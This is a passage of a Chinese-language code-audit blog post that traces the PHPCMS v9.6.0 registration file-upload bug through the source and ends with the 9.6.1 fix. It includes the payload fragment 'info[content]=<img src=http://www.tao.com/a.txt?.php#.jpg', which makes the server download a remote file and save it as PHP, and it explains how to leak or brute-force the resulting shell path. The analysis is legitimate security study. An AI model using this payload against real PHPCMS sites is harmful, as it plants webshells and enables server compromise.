<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// phpcms/libs/classes/cache_factory.class.php 53行处</span></span><br><span class="line">	<span class="keyword">protected</span> $cache_list = <span class="keyword">array</span>();</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">get_cache</span>(<span class="params">$cache_name</span>) </span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;cache_list[$cache_name]) || !is_object(<span class="keyword">$this</span>-&gt;cache_list[$cache_name])) &#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;cache_list[$cache_name] = <span class="keyword">$this</span>-&gt;load($cache_name);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">$this</span>-&gt;cache_list[$cache_name];</span><br><span class="line">	&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>$cache_list</code>是个空数组，因此<code>$this-&gt;cache_list[$cache_name]</code>不存在，且不是对象。跟着会执行下面的代码，我们跟进一下<code>load</code>方法.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">$this</span>-&gt;cache_list[$cache_name] = <span class="keyword">$this</span>-&gt;load($cache_name);</span><br></pre></td></tr></table></figure>

<p><code>load</code>方法代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">load</span>(<span class="params">$cache_name</span>) </span>&#123;</span><br><span class="line">		$object = <span class="literal">null</span>;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;cache_config[$cache_name][<span class="string">&#x27;type&#x27;</span>])) &#123;</span><br><span class="line">			<span class="keyword">switch</span>(<span class="keyword">$this</span>-&gt;cache_config[$cache_name][<span class="string">&#x27;type&#x27;</span>]) &#123;</span><br><span class="line">				<span class="keyword">case</span> <span class="string">&#x27;file&#x27;</span> :</span><br><span class="line">					$object = pc_base::load_sys_class(<span class="string">&#x27;cache_file&#x27;</span>);</span><br><span class="line">					<span class="keyword">break</span>;</span><br><span class="line">				<span class="keyword">case</span> <span class="string">&#x27;memcache&#x27;</span> :</span><br><span class="line">					define(<span class="string">&#x27;MEMCACHE_HOST&#x27;</span>, <span class="keyword">$this</span>-&gt;cache_config[$cache_name][<span class="string">&#x27;hostname&#x27;</span>]);</span><br><span class="line">					define(<span class="string">&#x27;MEMCACHE_PORT&#x27;</span>, <span class="keyword">$this</span>-&gt;cache_config[$cache_name][<span class="string">&#x27;port&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p>由于<code>$cache_name = &#39;file&#39;</code>, 从而执行<code>$object = pc_base::load_sys_class(&#39;cache_file&#39;);</code>,跟进一下<code>pc_base::load_sys_class</code>方法</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314180004931.png" alt="image-20210314180004931"></p>
<p>调用了<code>_load_class</code>类，继续进入</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314181859518.png" alt="image-20210314181859518"></p>
<p>122行的代码不会执行，因为文件路劲中<code>没有自己的扩展文件</code>，<code>my_path</code>方法代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">my_path</span>(<span class="params">$filepath</span>) </span>&#123;</span><br><span class="line">	$path = pathinfo($filepath);</span><br><span class="line">	<span class="keyword">if</span> (file_exists($path[<span class="string">&#x27;dirname&#x27;</span>].DIRECTORY_SEPARATOR.<span class="string">&#x27;MY_&#x27;</span>.$path[<span class="string">&#x27;basename&#x27;</span>])) &#123;</span><br><span class="line">		<span class="keyword">return</span> $path[<span class="string">&#x27;dirname&#x27;</span>].DIRECTORY_SEPARATOR.<span class="string">&#x27;MY_&#x27;</span>.$path[<span class="string">&#x27;basename&#x27;</span>];</span><br><span class="line">           <span class="comment">// 没有 my_cache_file.class.php</span></span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上图执行到130行，返回了<code>cache_file</code>对象（因为<code>$name=&#39;cache_file&#39;</code>），内容见下图：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314182231735.png" alt="image-20210314182231735"></p>
<p>这里返回完了以后，退出到执行<code>phpsso_server/phpcms/libs/functions/global.func.php</code>中548行处<code>get</code>方法，代码如下：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314182655317.png" alt="image-20210314182655317"></p>
<p>代码传入的参数<code>$name</code>就是下图的<code>&#39;model_field_&#39;.$modelid</code> = <code>&#39;model_field_10&#39;</code>：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314182750163.png" alt="image-20210314182750163"></p>
<p>看看get方法，可以发现，它包含了<code>/caches/caches_model/caches_data/model_field_10.cache.php</code>文件</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314183930348.png" alt="image-20210314183930348"></p>
<p>且91行返回了<code>/caches/caches_model/caches_data/model_field_10.cache.php</code>中的内容</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314184250681.png" alt="image-20210314184250681"></p>
<p>内容如下：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314091245587.png" alt="image-20210314091245587"></p>
<p><code>$func = $this-&gt;fields[$field][&#39;formtype&#39;];</code> 对应此文件中<code>&#39;formtype&#39; =&gt; datetime</code>，因此这里<code>$func = datetime</code>。</p>
<p>当然，这里数据也可以通过数据库中<code>v9_member_field</code>表获取。</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314212730989.png" alt="image-20210314212730989"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314210556278.png" alt="image-20210314210556278"></p>
<p>可能上面描述的不太直观，我们再次梳理一下获取<code>datetime</code>函数的流程：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314210309027.png" alt="image-20210314210309027"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314210322967.png" alt="image-20210314210322967"></p>
<p>接下来我们分析poc</p>
<blockquote>
<p>注意：再一次使用poc的时候，我们需要保证<code>username</code>值和<code>email</code>是唯一的</p>
</blockquote>
<p>通过上面的分析，直接下断点到关键处</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314212901681.png" alt="image-20210314212901681"></p>
<p>如上图，这里获取的是<code>editor</code>函数，而在这个函数中，有个<code>download</code>方法(下图，文件在<code>caches/caches_model/caches_data/member_input.class.php</code>)</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314212935364.png" alt="image-20210314212935364"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213035969.png" alt="image-20210314213035969"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213110830.png" alt="image-20210314213110830"></p>
<p>上面关键代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ext = <span class="string">&#x27;gif|jpg|jpeg|bmp|png&#x27;</span>;</span><br><span class="line">...</span><br><span class="line">$string = new_stripslashes($value);</span><br><span class="line"><span class="keyword">if</span>(!preg_match_all(<span class="string">&quot;/(href|src)=([\&quot;|&#x27;]?)([^ \&quot;&#x27;&gt;]+\.(<span class="subst">$ext</span>))\\2/i&quot;</span>,$string, $matches)) <span class="keyword">return</span> $value;</span><br></pre></td></tr></table></figure>

<p>这个正则匹配不难理解，需要满足<code>href/src=url. (gif|jpg|jpeg|bmp|png) </code>，这就是为什么我们写<code>info[content]=&lt;img src=http://www.tao.com/a.txt?.php#.jpg</code>（符合这个格式，而且加<code>.jpg</code>的原因），接着进入<code>fillurl</code>方法</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213134570.png" alt="image-20210314213134570"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213548087.png" alt="image-20210314213548087"></p>
<p>在上图的<code>fillurl</code>方法中,通过下面代码去掉了锚点.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$pos = strpos($surl,<span class="string">&#x27;#&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>($pos&gt;<span class="number">0</span>) $surl = substr($surl,<span class="number">0</span>,$pos);</span><br></pre></td></tr></table></figure>

<p><code>strpos</code>定位<code>#</code>, 然后使用<code>substr</code>处理<code>http://www.tao.com/t.txt?.php#.jpg</code>, 处理完之后<code>$surl = http://www.tao.com/t.txt?.php</code>。</p>
<p>继续执行，可以发现返回的url去掉了<code>#</code>后面的内容</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213653293.png" alt="image-20210314213653293"></p>
<p>下面166行处获取了上面返回url的后缀，及<code>php</code>,通过<code>getname</code>方法进行重命名，可以发现的是，<code>getname</code>方法返回的文件名也只是时间+随机的三位数。如果不返回上传文件的url地址，也可以通过爆破获取。</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213759469.png" alt="image-20210314213759469"></p>
<p>接着程序调用了<code>copy</code>函数,对远程的url文件进行了下载</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213822263.png" alt="image-20210314213822263"></p>
<p>这里的<code>$this-&gt;upload_func</code>是<code>copy</code>函数的原因,是因为初始化时赋给的（看下图）</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314214128879.png" alt="image-20210314214128879"></p>
<p>此时能看到我们要写入的内容已经成功写入文件了。</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213944612.png" alt="image-20210314213944612"></p>
<p>接着我们来看看写入文件的路劲是如何返回给我们的。上面程序执行完以后，回到了<code>register</code>函数中：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314223358815.png" alt="image-20210314223358815"></p>
<p>F7跟进</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314223508528.png" alt="image-20210314223508528"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO `phpcmsv96`.`v9_member_detail`(`content`,`userid`) VALUES (<span class="string">&#x27;&amp;lt;img src=http://www.phpcms96.com/uploadfile/2021/0314/20210314103307168.php&amp;gt;&#x27;</span>,<span class="string">&#x27;25&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>可以发现，上上图140行处<code>$status &gt; 0</code>时会执行上面的SQL语句，也就是向<code>v9_member_detail</code>的<code>content</code>和<code>userid</code>两列插入数据</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210207090423515.png" alt="img"></p>
<p>但是由于<code>v9_member_detail</code>表结构中没有<code>content</code>列，产生了报错。从而将插入数据中的sql报错语句(包含shell 路径)返回了前台页面。</p>
<p>前面说140行<code>$status&gt;0</code> 时才会执行 SQL 语句进行 INSERT 操作。我们来看一下什么时候<code>$status &lt;= 0</code>,不执行<code>insert</code>呢?</p>
<p>通过前面139行我们发现<code>$status</code>是由<code>client</code>类中<code>ps_member_register</code>方法返回的（函数路劲在： <code>phpcms/modules/member/classes/client.class.php</code> ）</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314214924756.png"></p>
<p><code>$status &lt;= 0</code>都是因为用户名和邮箱不唯一导致的，所以我们payload尽量要随机</p>
<p>另外在 phpsso 没有配置好的时候<code>$status</code>的值为空，也同样不能得到路径</p>
<p>在无法得到路径的情况下我们只能爆破了 ，文件名的生成方法(在<code>phpcms/libs/classes/attachment.class.php</code>)</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314213759469.png" alt="image-20210314213759469"></p>
<p>返回的文件名也只是时间+随机的三位数。比较容易爆破的。</p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>在phpcms9.6.1中修复了该漏洞，修复方案就是对用<code>fileext</code>获取到的文件后缀再用黑白名单分别过滤一次</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210207093004450.png" alt="img-end"></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Bobtaoy</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://bobtaoy.github.io/2021/02/07/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-6-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">https://bobtaoy.github.io/2021/02/07/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-6-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a></div><div class="post_share"><div class="social-share" data-image="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/02/09/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMS%20v9.6.0%20wap%E6%A8%A1%E5%9D%97SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><img class="prev-cover" src="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">代码审计之PHPCMSv9.6.0 wap模块SQL注入漏洞分析</div></div></a></div><div class="next-post pull-right"><a href="/2021/02/06/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-2%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><img class="next-cover" src="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">代码审计之PHPCMS_V9.2任意文件上传getshell漏洞分析</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2021/02/06/代码审计之PHPCMSV9-2上传漏洞分析/" title="代码审计之PHPCMS_V9.2任意文件上传getshell漏洞分析"><img class="cover" src="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-02-06</div><div class="title">代码审计之PHPCMS_V9.2任意文件上传getshell漏洞分析</div></div></a></div><div><a href="/2021/02/09/代码审计之PHPCMS v9.6.0 wap模块SQL注入漏洞分析/" title="代码审计之PHPCMSv9.6.0 wap模块SQL注入漏洞分析"><img class="cover" src="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-02-09</div><div class="title">代码审计之PHPCMSv9.6.0 wap模块SQL注入漏洞分析</div></div></a></div><div><a href="/2021/02/10/代码审计之PHPCMS-v9-6-1-任意文件读取漏洞分析/" title="代码审计之PHPCMS v9.6.1 任意文件读取漏洞分析"><img class="cover" src="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-02-10</div><div class="title">代码审计之PHPCMS v9.6.1 任意文件读取漏洞分析</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> Comment</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></article></main><footer id="footer" style="background-image: url(https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg)"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By Bobtaoy</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Just trust yourself, then you will know how to live.</div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><a id="to_comment" href="#post-comment" title="Scroll To Comments"><i class="fas fa-comments"></i></a><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    const initData = {
      el: '#vcomment',
      appId: '8zpT8ubnMCs0p3vahHLvnomJ-gzGzoHsz',
      appKey: 'QjoNCC6qtXBclb6ll0XkwEbV',
      placeholder: 'Please leave your footprints',
      avatar: 'wavatar',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'en',
      recordIP: false,
      serverURLs: '',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: false,
      path: window.location.pathname,
    }

    if (true) { 
      initData.requiredFields= ('nick,mail'.split(','))
    }

    const valine = new Valine(initData)
  }

  if (typeof Valine === 'function') initValine() 
  else $.getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js', initValine)
}

if ('Valine' === 'Valine' || !true) {
  if (true) btf.loadComment(document.querySelector('#vcomment'),loadValine)
  else setTimeout(() => loadValine(), 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/fireworks.min.js"></script></div></body></html>